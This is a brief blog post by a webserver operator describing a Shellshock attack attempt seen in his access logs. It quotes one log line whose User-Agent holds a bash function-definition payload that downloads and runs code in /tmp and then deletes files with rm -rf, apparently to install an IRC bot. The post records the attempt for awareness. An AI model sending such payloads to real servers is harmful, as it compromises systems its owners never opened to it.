recently in the webserver log ..

While strolling through the webserver-logs, I found this little asshole..: - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi
HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget;curl -O;fetch;lwp-download;perl;rm -rf;rm -rf*\"" installs an irc-connection and waits for commands like
portscan, tcpflood or a reverse shell ..

Looks like there are still servers out there which are vulnerable to shellshock ..

Leave a Reply

You must be logged in to post a comment.